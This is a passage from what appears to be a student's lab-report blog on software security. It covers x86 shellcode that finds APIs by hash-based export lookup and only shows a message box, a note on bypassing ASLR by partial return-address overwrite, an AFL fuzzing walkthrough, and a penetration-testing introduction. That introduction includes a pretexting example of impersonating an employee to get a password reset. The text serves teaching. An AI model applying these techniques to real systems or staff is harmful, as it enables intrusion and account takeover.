movebx,[ecx+<span class="number">0x20</span>]<span class="comment">//导出函数名列表指针</span></span><br><span class="line">        addebx,ebp             <span class="comment">//ebx=导出函数名列表指针的基地址</span></span><br><span class="line">        xoredi,edi           </span><br><span class="line">        </span><br><span class="line">        <span class="comment">//======找下一个函数名       </span></span><br><span class="line">next_function_loop:</span><br><span class="line">        incedi</span><br><span class="line">        mov     esi,[ebx+edi*<span class="number">4</span>]      <span class="comment">//从列表数组中读取</span></span><br><span class="line">        addesi,ebp   <span class="comment">//esi = 函数名称所在地址</span></span><br><span class="line">        cdq                        <span class="comment">//edx = 0</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment">//======函数名的hash运算 </span></span><br><span class="line">hash_loop:                         </span><br><span class="line">        movsxeax,byte ptr[esi]  </span><br><span class="line">        cmpal,ah              <span class="comment">//字符串结尾就跳出当前函数  </span></span><br><span class="line">        jzcompare_hash</span><br><span class="line">        ror     edx,<span class="number">7</span></span><br><span class="line">        addedx,eax</span><br><span class="line">        incesi</span><br><span class="line">        jmphash_loop</span><br><span class="line">        <span class="comment">//======比较找到的当前函数的hash是否是自己想找的</span></span><br><span class="line">compare_hash:</span><br><span class="line">        cmpedx,[esp+<span class="number">0x1C</span>]    <span class="comment">//lods pushad后,栈+1c为LoadLibraryA的hash</span></span><br><span class="line">        jnznext_function_loop</span><br><span class="line">        movebx,[ecx+<span class="number">0x24</span>]    <span class="comment">//ebx = 顺序表的相对偏移量</span></span><br><span class="line">        addebx,ebp           <span class="comment">//顺序表的基地址</span></span><br><span class="line">        mov     di,[ebx+<span class="number">2</span>*edi]    <span class="comment">//匹配函数的序号</span></span><br><span class="line">        movebx,[ecx+<span class="number">0x1C</span>]    <span class="comment">//地址表的相对偏移量</span></span><br><span class="line">        addebx,ebp           <span class="comment">//地址表的基地址</span></span><br><span class="line">        addebp,[ebx+<span class="number">4</span>*edi]   <span class="comment">//函数的基地址        </span></span><br><span class="line">        xchgeax,ebp           <span class="comment">//eax&lt;==&gt;ebp 交换</span></span><br><span class="line">        </span><br><span class="line">        popedi</span><br><span class="line">        stosd                     <span class="comment">//把找到的函数保存到edi的位置</span></span><br><span class="line">        pushedi</span><br><span class="line">        </span><br><span class="line">        popad                     </span><br><span class="line">        cmpeax,<span class="number">0x1e380a6a</span>    <span class="comment">//找到最后一个函数MessageBox后，跳出循环</span></span><br><span class="line">        jnefind_lib_functions</span><br><span class="line"></span><br><span class="line">        <span class="comment">//======让他做些自己想做的事</span></span><br><span class="line">function_call:</span><br><span class="line">        xorebx,ebx</span><br><span class="line">        pushebx               </span><br><span class="line">        push <span class="number">0x74736577</span>     </span><br><span class="line">        push <span class="number">0x74736577</span>     <span class="comment">//push &quot;westwest&quot;</span></span><br><span class="line">        moveax,esp    </span><br><span class="line">        pushebx</span><br><span class="line">        pusheax</span><br><span class="line">        pusheax</span><br><span class="line">        pushebx</span><br><span class="line">        call[edi<span class="number">-0x04</span>]        <span class="comment">//MessageBoxA(NULL,&quot;westwest&quot;,&quot;westwest&quot;,NULL)</span></span><br><span class="line">        pushebx               </span><br><span class="line">        call[edi<span class="number">-0x08</span>]        <span class="comment">//ExitProcess(0);</span></span><br><span class="line">        nop                       </span><br><span class="line">        nop</span><br><span class="line">        nop</span><br><span class="line">        nop</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>结果如下图所示：</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111413548.png" alt="image-20250102111413548"></p><h3 id="四．-心得体会"><a href="#四．-心得体会" class="headerlink" title="四．  心得体会"></a><strong>四．</strong>  <strong>心得体会</strong></h3><p>自搜索API是为了绕过ASLR保护，除了自搜索API，对于ASLR缺陷和绕过方法，也学习了<strong>部分返回地址覆盖法（off by one）</strong>。（看到书上有提及）</p><p>查资料——在ASLR中，虽然模块加载基地址发生变化，但是各模块的入口点地址的低字节不变，只有<strong>高位变化</strong>。对于地址0x12345678，其中5678部分是固定的，如果存在缓冲区溢出，可以通过memcpy对后两个字节进行覆盖，可以将其设置为0x12340000~0x1234FFFF中的任意一个值。如果通过strcpy进行覆盖，因为strcpy会复制末尾的结束符0x00，那么可以将0x12345678覆盖为0x12345600，或者0x12340001 ~ 0x123400FF。部分返回地址覆盖，可以使得<strong>覆盖后的地址相对于基地址的距离是固定的</strong>，可以从基地址附近找可以利用的跳转指令。</p><p>理解来看，<strong>映像基址随机化</strong>只是对加载地址的前两个字节进行了随机化, 后面两个字节没有变化。所以可以通过覆盖后两个字节，在0x0000—0xFFFF的地址空间内寻找跳板，控制EIP，转入payload执行。</p><h2 id="实验五：AFL模糊测试工具使用"><a href="#实验五：AFL模糊测试工具使用" class="headerlink" title="实验五：AFL模糊测试工具使用"></a><strong>实验五：AFL模糊测试工具使用</strong></h2><h3 id="一．-实验环境-2"><a href="#一．-实验环境-2" class="headerlink" title="一． 实验环境"></a>一． 实验环境</h3><p>Ubuntu操作系统。</p><h3 id="二．-实验目的-2"><a href="#二．-实验目的-2" class="headerlink" title="二． 实验目的"></a>二． 实验目的</h3><ol><li><p>下载并编译AFL；</p></li><li><p>基于给定的示例程序或其他自选目标，学习模糊测试过程。</p></li><li><p>会分析找到的crash样本。</p></li><li><p>理解AFL计算代码覆盖率的原理，样本变异的方法。</p></li></ol><h3 id="三．-实验步骤-2"><a href="#三．-实验步骤-2" class="headerlink" title="三． 实验步骤"></a>三． 实验步骤</h3><p>AFL是一款基于覆盖引导（Coverage-guided）的模糊测试工具，它通过<strong>插桩</strong>的方式<strong>获取程序代码运行轨迹、记录输入样本引起的被测程序已运行代码的覆盖率</strong>，从而<strong>调整输入样本</strong>以提高代码覆盖率、增加发现漏洞的概率。</p><p>AFL主要用于C&#x2F;C++程序的测试，且不论有无被测程序源码均可以测试：有源码时可以对源码进行编译时插桩，无源码时可以借助QEMU的User-Mode模式进行<strong>二进制插桩</strong>。</p><p>其工作流程大致如下：</p><p>（1）对待测程序进行插桩（编译时插桩或者二进制插桩），以记录代码覆盖率（code coverage）；</p><p>（2）选择一些初始输入文件（seed），作为初始测试集加入输入队列（queue）；</p><p>（3）将队列中的文件按照一定策略进行“突变”（mutate）。在AFL工具中，常用突变方式有<strong>按位翻转（bitflip）、整数加&#x2F;减算术运算（arithmetic）、将特殊内容替换到原文件中（interest）、把自动生成或用户提供的token替换&#x2F;插入到原文件中（dictionary）、“大破坏”，是前面几种变异的组合（havoc）、“连接”，此阶段会将两个文件拼接起来得到一个新的文件（splice）</strong>等；</p><p>（4）将突变后的文件输入到被测程序中，如果该文件更新了已运行代码覆盖范围，则将其保留并添加到输入队列中;</p><p>（5）上述过程（3）和（4）会一直循环进行，期间触发了被测系统崩溃（crash）的文件会被记录下来。</p><p>流程图如下图</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105642468.png" alt="image-20250102105642468">          </p><h4 id="1-AFL安装"><a href="#1-AFL安装" class="headerlink" title="1. AFL安装"></a><strong>1. AFL</strong>安装</h4><p>在Kali 2021系统中，在命令行输入sudo apt-get install afl即可安装。</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105656772.png" alt="image-20250102105656772"></p><p>作用分别为：</p><ul><li>afl-gcc和afl-g++分别对应的是gcc和g++的封装。</li><li>afl-clang和afl-clang++分别对应clang的c和c++编译器封装。</li><li><strong>afl-fuzz****是AFL的主体，用于对目标程序进行模糊测试。</strong></li><li>afl-analyze可以对用例进行分析，看能否发现用例中有意义的字段。</li><li>afl-qemu-trace用于qemu-mode，默认不安装，需要手工执行qemu-mode的编译脚本进行编译。</li><li>afl-plot生成测试任务的状态图。</li><li>afl-tmin和afl-cmin对用例进行简化。</li><li>afl-whatsup用于查看fuzz任务的状态。</li><li>afl-gotcpu用于查看当前CPU 状态。</li><li>afl-showmap用于对单个用例进行执行路径跟踪。</li></ul><h4 id="2-AFL进行模糊测试"><a href="#2-AFL进行模糊测试" class="headerlink" title="2. AFL进行模糊测试"></a><strong>2. AFL</strong>进行模糊测试</h4><p>前文提到不论是否拥有被测程序的源码，AFL都可以进行测试。其区别在于获得代码覆盖率的插桩方式不同：如果拥有被测程序的源码（称为白盒测试），则在程序编译时进行插桩；如果没有被测程序的源码（称为黑盒测试），则在已经编译好的可执行文件上进行二进制插桩。</p><h5 id="1）创建本次实验的程序"><a href="#1）创建本次实验的程序" class="headerlink" title="1）创建本次实验的程序"></a>1）创建本次实验的程序</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span> &#123;</span><br><span class="line">  <span class="type">char</span> ptr[<span class="number">20</span>];</span><br><span class="line">  <span class="keyword">if</span>(argc&gt;<span class="number">1</span>)&#123;</span><br><span class="line">           FILE *fp = fopen(argv[<span class="number">1</span>], <span class="string">&quot;r&quot;</span>);</span><br><span class="line">           fgets(ptr, <span class="keyword">sizeof</span>(ptr), fp);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span>&#123;</span><br><span class="line">          fgets(ptr, <span class="keyword">sizeof</span>(ptr), <span class="built_in">stdin</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;%s&quot;</span>, ptr);</span><br><span class="line">  <span class="keyword">if</span>(ptr[<span class="number">0</span>] == <span class="string">&#x27;d&#x27;</span>) &#123;</span><br><span class="line">          <span class="keyword">if</span>(ptr[<span class="number">1</span>] == <span class="string">&#x27;e&#x27;</span>) &#123;</span><br><span class="line">                  <span class="keyword">if</span>(ptr[<span class="number">2</span>] == <span class="string">&#x27;a&#x27;</span>) &#123;</span><br><span class="line">                          <span class="keyword">if</span>(ptr[<span class="number">3</span>] == <span class="string">&#x27;d&#x27;</span>) &#123;</span><br><span class="line">                                  <span class="keyword">if</span>(ptr[<span class="number">4</span>] == <span class="string">&#x27;b&#x27;</span>) &#123;</span><br><span class="line">                                          <span class="keyword">if</span>(ptr[<span class="number">5</span>] == <span class="string">&#x27;e&#x27;</span>) &#123;</span><br><span class="line">                                                  <span class="keyword">if</span>(ptr[<span class="number">6</span>] == <span class="string">&#x27;e&#x27;</span>) &#123;</span><br><span class="line">                                                          <span class="keyword">if</span>(ptr[<span class="number">7</span>] == <span class="string">&#x27;f&#x27;</span>) &#123;</span><br><span class="line">                                                                  <span class="built_in">abort</span>();</span><br><span class="line">                                                          &#125;</span><br><span class="line">                                                          <span class="keyword">else</span>    <span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span>,ptr[<span class="number">7</span>]);</span><br><span class="line">                                                   &#125;</span><br><span class="line">                                                   <span class="keyword">else</span>    <span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span>,ptr[<span class="number">6</span>]);</span><br><span class="line">                                          &#125;</span><br><span class="line">                                          <span class="keyword">else</span>    <span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span>,ptr[<span class="number">5</span>]);</span><br><span class="line">                                  &#125;</span><br><span class="line">                                  <span class="keyword">else</span>    <span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span>,ptr[<span class="number">4</span>]);</span><br><span class="line">                          &#125;</span><br><span class="line">                          <span class="keyword">else</span>    <span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span>,ptr[<span class="number">3</span>]);</span><br><span class="line">                  &#125;</span><br><span class="line">                  <span class="keyword">else</span>    <span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span>,ptr[<span class="number">2</span>]);</span><br><span class="line">          &#125;</span><br><span class="line">          <span class="keyword">else</span>    <span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span>,ptr[<span class="number">1</span>]);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span>    <span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span>,ptr[<span class="number">0</span>]);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用AFL的编译器编译待测程序，可以使模糊测试过程更加高效。</p><p>编译命令：afl-gcc -o test test.c </p><p>test.c源码编译完成后输出名为test的文件，且编译后test中会有插桩符号，使用下面的命令可以验证这一点。</p><p>命令：<strong>readelf -s .&#x2F;test | grep afl</strong>，</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105745900.png" alt="image-20250102105745900"></p><h5 id="2）创建初始测试用例"><a href="#2）创建初始测试用例" class="headerlink" title="2）创建初始测试用例"></a><strong>2</strong>）创建初始测试用例</h5><p>首先，使用如下命令创建两个文件夹in和out，分别存储模糊测试过程中使用到的输入和输出文件。</p><p>命令：<strong>mkdir in out</strong></p><p>其次，使用如下命令在输入文件夹（in）中创建一个包含字符串“hello”的文件。注意：这里的字符串“hello”仅为我们提供的初始输入，该初始输入可以为任意字符串，如“hell”“hlo”等均可。</p><p>命令：<strong>echo hello&gt; SS5in&#x2F;seed</strong></p><p>seed就是我们的测试用例，里面包含初步字符串hello。AFL会通过这个种子进行变异，构造更多的测试用例。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105800926.png" alt="image-20250102105800926"></p><h5 id="3-）启动模糊测试"><a href="#3-）启动模糊测试" class="headerlink" title="3****）启动模糊测试"></a><strong>3****）启动模糊测试</strong></h5><p>运行如下命令，开始启动模糊测试。</p><p>命令：<strong>afl-fuzz -i in -o out – .&#x2F;test @@</strong></p><p>可能出现：</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105806856.png" alt="image-20250102105806856"></p><p>前文中提到，AFL会监视待测程序的crash并将造成crash的输入记录，因此在进行下一步之前，还需要使用如下命令指示系统将coredumps<strong>输出为文件以便AFL监视系统运行状态</strong>，而不是将它们发送到特定的崩溃处理程序应用程序。</p><p>命令：<strong>echo core &gt; &#x2F;proc&#x2F;sys&#x2F;kernel&#x2F;core_pattern</strong></p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105812832.png" alt="image-20250102105812832"></p><p>下面对部分经常用于分析的界面内容进行介绍：</p><p><strong>·process timing</strong></p><p>这里展示了当前模糊测试程序的运行时间(1min6s)、最近一次发现新执行路径（代码覆盖率增加）的时间(15s)、最近一次崩溃的时间(12s)、最近一次超时的时间(无)。</p><p><strong>·overall results</strong></p><p>这里包括运行的总周期数（115）、总路径数（8）、崩溃次数（1）、超时次数（0）。</p><p>其中，总周期数可以用来作为何时停止模糊测试程序的参考。随着不断地fuzzing，<strong>周期数会不断增大</strong>，其颜色也会由洋红色，逐步变为黄色、蓝色、绿色（这个看上去像是洋红色）。一般来说，当其变为<strong>绿色</strong>时，代表可执行的内容已经很少了，继续fuzzing下去也不会有什么新的发现了。此时，我们便可以通过快捷键Ctrl+C结束进程，中止当前的fuzzing。</p><p>·<strong>stage progress</strong></p><p>这里包括在测试过程中使用的突变策略（splice 11）、进度（214&#x2F;384 55.73%）、目标的执行总次数（357k）、目标的执行速度（5366&#x2F;sec）。执行速度可以直观地反映当前模糊测试工作跑的快不快，速度越快表示在1秒钟之内执行被测程序的数量越多，如果速度过慢，比如低于500次&#x2F;秒，那么测试时间就会变得非常漫长。如果发生了这种情况，我们需要<strong>调整<strong><strong>并</strong></strong>优化我们的fuzzing策略</strong>，以提高模糊测试效率。</p><h5 id="4）分析crash"><a href="#4）分析crash" class="headerlink" title="4）分析crash"></a><strong>4</strong>）分析crash</h5><p>观察fuzzing结果，如有crash，则定位、分析引起crash的输入。</p><p>crash！！！</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105821251.png" alt="image-20250102105821251"></p><p>在out文件夹下的crashes子文件夹里面是在模糊测试过程中引起被测程序crash的样例，hangs里面是产生超时的样例，queue里面是每个不同执行路径的样例。</p><p>通常，在得到crash样例后，分析人员可以将这些样例作为输入重新输入到被测程序，以<strong>重新触发</strong>被测程序异常并跟踪程序运行状态（如代码执行路径），并进一步分析、定位引起程序崩溃的原因或确认存在的漏洞类型。</p><p>其中重新输入并尝试触发被测程序异常是<strong>排除当前输入仅是偶然引起报错但是无法复现的情况</strong>，如有时与被测程序交互需要通过传输网络<strong>数据包</strong>的形式，可能由于<strong>网络波动</strong>造成目标程序异常而意外让模糊测试程序认为是当前输入引起的目标程序异常。</p><p>如果多次使用相同输入均能复现目标程序的异常，那么可以认为确实是由该输入引起的crash。</p><p>与此同时，<strong>并不是所有引起crash的地方都是能够被利用的漏洞，是否能够利用还需要通过分析人员的判断</strong>。</p><h4 id="3-AFL计算代码覆盖率的原理，样本变异的方法"><a href="#3-AFL计算代码覆盖率的原理，样本变异的方法" class="headerlink" title="3.AFL计算代码覆盖率的原理，样本变异的方法"></a>3.<strong>AFL</strong>计算代码覆盖率的原理，样本变异的方法</h4><p><strong>这里有参考文章：</strong> <strong>[<a href="https://bbs.kanxue.com/thread-284327.htm">原创]fuzzing原理探究(上)：afl，afl++背后的变异算法-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com</a></strong> </p><p><strong>Afl主要流程如下：</strong></p><p>①在从源码编译程序时进行插桩，以记录代码覆盖率（Code Coverage）。</p><p>②选择一些输入文件作为初始测试集，加入输入队列（queue）。</p><p>③对队列中的文件按一定策略进行“突变”。</p><p>④如果变异文件扩展了覆盖范围，则将其保留并添加到队列中。</p><p>⑤上述过程循环进行，期间触发 crash 的文件会被记录下来。</p><p><strong>其主要功能定义在fuzz_one()函数中</strong></p><p>fuzz_one(char** argv):获取测试用例并喂给目标程序</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105910420.png" alt="image-20250102105910420"></p><p>根据优胜者机制按概率跳过</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105917339.png" alt="image-20250102105917339"></p><p>调用trim_case():对当前测试用例进行剪枝，以减少无效数据。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105925355.png" alt="image-20250102105925355"></p><p>calculate_score():计算测试用例得分。根据执行时间、覆盖率、新路径和深度对测试用例评分，确保高潜力的测试用例在变异过程中获得更多机会。</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105933393.png" alt="image-20250102105933393"></p><p>然后进行变异（如bitflip、arithmetic inc&#x2F;dec等），变异后调用common_fuzz_stuff处理结果。</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105939339.png" alt="image-20250102105939339"></p><p>save_if_interesting():保存有趣的测试用例。检查执行结果是否有趣，即，调用has_new_bits(virgin_bits)来判断是否产生了新的路径元组，若是则保存或加入队列(add_to_queue)。trace_bits指向由全体进程共享的内存区域，其中包含每次样本执行的覆盖率，其实是之后提到的覆盖次数桶的压缩存储。</p><p>AFL 会比较当前输入的执行路径与已有路径信息，判断是否发现了“新路径”。如果覆盖了之前未探索的分支，则认为是“有趣的输入”，并将该输入加入种子池。</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102105950864.png" alt="image-20250102105950864"></p><p>如果想要统计覆盖率，就需要用到插桩技术，插桩有三种模式：<strong>llvm mode，汇编层面插桩，qemu-mode动态插桩</strong>。（前两者是静态，第三者动态）</p><p>  <strong>llvm mode</strong>——借助LLVM的Pass来更改中间代码表示<strong>IR</strong>(Intermediate Representation)（编译器或虚拟机内部用于代表源代码的数据结构或代码）,从而在编译过程中实现插桩。</p><p>  <strong>汇编层面插桩——</strong>在机器语言的环节：128行，在代码块结束处，调用 <strong>__afl_maybe_log__函数</strong>，而其为探测点（Probe Points）相关汇编代码</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250103003809564.png" alt="image-20250103003809564"></p><p>该代码插入点为每个代码块开始部分（不同于函数的入口点），基于开始点，这样记录程序执行此处的次数和路径。</p><p>对于分支部分的插桩，因为分支数量往往巨大（em一个小函数的在IDA中的分支块也是很多的），这里使用 inst_ratio_str函数来控制分支插桩比例：</p><p>​                               <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250103003824598.png" alt="image-20250103003824598"></p><p>（可以看到llvm和汇编方法中都有相关函数）</p><p>Eff_map——记录每个字节是否引起了新路径元组的出现，来评估对整个元组的影响。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250103003847537.png" alt="image-20250103003847537"></p><p>Ø 如果 byte 尝试所有改变都没有出现新路径，AFL开发者认为这种字节很有可能只是单纯的非元数据，<strong>AFL后续会参考eff_map 进行选择性的跳过</strong>。接下来每次变异都会检查eff_map中的对应项 ，如果当前字节对应的项为 0 ，则检查变异以后路径是否有新元组产生，如果是则置为 1。</p><p>Ø eff_map会将输入测试用例文件<strong>小于128字节的情况（EFF_MIN_LEN）</strong>，认为每个字节都是有效的，而如果一个测试用例，90%的字节都能触发新路径元组，那么AFL会直接把剩余的10%也认为是有效的。<br> 这种做法改善了变异的方向性，<strong>使其能够避免过多的无效变异，从而更加专注于有效的变异。</strong></p><p><strong>样本变异的方法</strong></p><p>AFL 的样本变异方法是模糊测试的核心，通过随机或特定模式对输入样本进行修改，尝试触发程序的未覆盖路径。以下是 AFL 的主要变异方法：</p><p>字节翻转（Bit Flipping）：</p><ol><li><ul><li>对输入数据的某些比特位进行翻转操作,这里**_ar<strong>传入需要进行位翻转操作的字节数组指针，</strong>_b**则是要翻转的位置。</li><li>例如：00000001 → 00000000 或 00000011。</li><li><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250103003908503.png" alt="image-20250103003908503"></li><li>这里是一些定义模式：<img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250103003923514.png" alt="image-20250103003923514"></li></ul></li><li><p>字节替换（Byte&#x2F;Substitution Mutation）</p></li><li><p>整数边界测试（Arithmetic Mutation）</p></li><li><p>插入和删除（Insertion&#x2F;Deletion）</p></li><li><p>字节块复制（Block Duplication）</p></li><li><p>字节块移位（Block Shuffling）</p></li><li><p>拼接变异（Splicing Mutation）</p></li><li><p>特定模式插入（Special Pattern Injection）</p></li></ol><ul><li>这里还要提到fuzz过程中，fork操作：</li></ul><p>Execve执行需要执行系统终端、系统调用、载入目标文件和库、解析符号地址等操作，如果每次使用execve非常消耗性能。所以afl使用fork服务器机制来减少系统调用次数。Fuzzer和fork的服务器通信、fuzzer和目标进程通过管道通信，目标进程准备好后通知fuzzer开始fork</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250103004052352.png" alt="image-20250103004052352"></p><h3 id="四．-心得体会-1"><a href="#四．-心得体会-1" class="headerlink" title="四． 心得体会"></a>四． 心得体会</h3><p>在搜索相关资料的过程中，我还发现了一个好玩的——<strong>Lcov</strong> <strong>对 AFL-Fuzz 进行覆盖率可视化分析</strong></p><p><strong>使用 lcov –directory . –capture –output-file test.info 产生 info 文件，再使用genhtml -o results test.info，产生覆盖率可视化文件：</strong></p><p>  <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110008506.png" alt="image-20250102110008506"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110018396.png" alt="image-20250102110018396"></p><p> AFL++整合了 AFL 的各类插件，实现兼容性、性能和变异能力的提升，并改进了遗传算法中变异的自定义方案，方便研究人员进行二次开发。</p><p>可以研究一下afl++</p><h2 id="实验六：渗透测试实验"><a href="#实验六：渗透测试实验" class="headerlink" title="实验六：渗透测试实验"></a><strong>实验六：渗透测试实验</strong></h2><h3 id="一．-实验环境-3"><a href="#一．-实验环境-3" class="headerlink" title="一． 实验环境"></a>一． 实验环境</h3><p>目标主机Windows XP系统。测试主机Linux环境。测试主机中安装Metasploit渗透测试工具和Nessus漏洞扫描工具。</p><h3 id="二．-实验目的-3"><a href="#二．-实验目的-3" class="headerlink" title="二． 实验目的"></a>二． 实验目的</h3><p>\1. 理解渗透测试的定义和主要步骤。</p><p>\2. 了解漏洞扫描。</p><p>\3. 了解渗透测试。</p><h3 id="三．-实验步骤-3"><a href="#三．-实验步骤-3" class="headerlink" title="三． 实验步骤"></a>三． 实验步骤</h3><h4 id="理解渗透测试的定义和主要步骤。"><a href="#理解渗透测试的定义和主要步骤。" class="headerlink" title="理解渗透测试的定义和主要步骤。"></a>理解渗透测试的定义和主要步骤。</h4><p>有一种说法是将<strong>渗透测试</strong>分为收集、扫描、漏洞利用和后维持攻击四个阶段，而已被安全业界领军企业所采纳的渗透测试执行标准（PTES: Penetration Testing Execution Standard）对渗透测试过程进行了标准化。PTES标准中定义的渗透测试过程环节基本上反映了安全业界的普遍认同，具体包括7个阶段。该标准项目网站的网址为：<a href="http://www.pentest-standard.org/%E3%80%82">http://www.pentest-standard.org/。</a></p><h5 id="1-前期交互阶段"><a href="#1-前期交互阶段" class="headerlink" title="1. 前期交互阶段"></a>1. 前期交互阶段</h5><p>在前期交互（Pre-Engagement Interaction）阶段，渗透测试团队与客户组织进行交互讨论，最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。该阶段通常涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动。</p><h5 id="2-情报搜集阶段"><a href="#2-情报搜集阶段" class="headerlink" title="2. 情报搜集阶段"></a>2. 情报搜集阶段</h5><p>在目标范围确定之后，将进入情报搜集（Information Gathering）阶段，渗透测试团队可以利用各种信息来源与搜集技术方法，尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。</p><p>渗透测试者可以使用的情报搜集方法包括公开来源信息查询、Google Hacking、社会工程学、网络踩点、扫描探测、被动监听、服务查点等。而对目标系统的情报探查能力是渗透测试者一项非常重要的技能，情报搜集是否充分在很大程度上决定了渗透测试的成败，因为如果你遗漏关键的情报信息，你将可能在后面的阶段里一无所获。</p><p>假设你是在一家安全公司工作的道德渗透测试员，你老板跑到你办公室，递给你一张纸，说”我刚跟那家公司的CEO在电话里聊了聊。他妥我派出最好的员工给他们公司做渗透测试一一这事得靠你了。一会儿法律部会给你发封邮件，确认我们已经得到相应的授权和保障。”然后你点了点头，接下这项任务。老板转身走了，你翻了翻丈件，发现纸上只写了公司的名字， Syngress 。这家公司你从来没听过，手头也没有其他任何信息。怎么办?</p><p>信息收集是渗透测试中最重要的一环。在收集目标信息上所花的时间越多，后续阶段的成功率就越高。具有讽刺意味的是，这一步骤恰恰是当前整个渗透测试方提体系中最容易被忽略、最不被重视、最易受人误解的一环。</p><p>若想要信息收集工作能够顺利进行，必须先制定策略。几乎各种信息的收集都需要借助互联网的力量。典型的策略应该同时包含主动和被动的信息收集：</p><p>（1）主动信息收集：包括与目标系统的直接交互。必须注意的是，在这个过程中，目标可能会记录下我们的IP 地址及活动。</p><p>（2）被动信息收集：则利用从网上获取的海量信息。当执行被动信息收集的时候，我们不会直接与目标交互，因此目标也不可能知道或记录我们的活动。</p><p>信息收集的技巧很多，除了纯技术性工具及操作外，社会工程学不得不提。不谈社会工程学的话，信息收集是不完整的。许多人甚至认为社会工程学是信息收集最简单、最有效的方怯之一。</p><p>社会工程学是攻击“人性”弱点的过程，而这种弱点是每个公司天然固有的。当使用社会工程学的时候，攻击者的目标是找到一个员工，并从他口中撬出本应是保密的信息。</p><p>假设你正在针对某家公司进行渗透测试。前期侦察阶段你已经发现这家公司某个销售人员的电子邮箱。你很清楚，销售人员非常有可能对产品问询邮件进行回复。所以用匿名邮箱对他发送邮件，假装对某个产品很感兴趣。</p><p>实际上，你对该产品并不关心。发这封邮件的真正目的是希望能够得到该销售人员的回复，这样你就可以分析回复邮件的邮件头。该过程可以使你收集到这家公司内部电子邮件服务器的相关信息。</p><p>接下来我们把这个社会工程学案例再往前推一步。假设这个销售人员的名字叫Ben Owned。(这个名字是根据对公司网站的侦察结果以及他回复邮件里的落款了解到的。〉假设在这个案例中，你发出产品问询邮件之后，结果收到一封自动回复的邮件，告诉你Ben Owned “目前正在海外旅游，不在公司”以及“接下来这两周只能通过有限的途径查收邮件”。</p><p>最经典的社会工程学的做法是冒充Ben Owned 的身份给目标公司的网络支持人员打电话，要求协助重置密码，因为你人在海外，无法以Web 方式登录邮箱。运气好的话，技术人员会相信你的话，帮你重置密码。如果他们使用相同的密码，你就不但能够登录Ben Owned 的电子邮箱，而且能通过VPN 之类的网络资源进行远程访问，或通过FTP 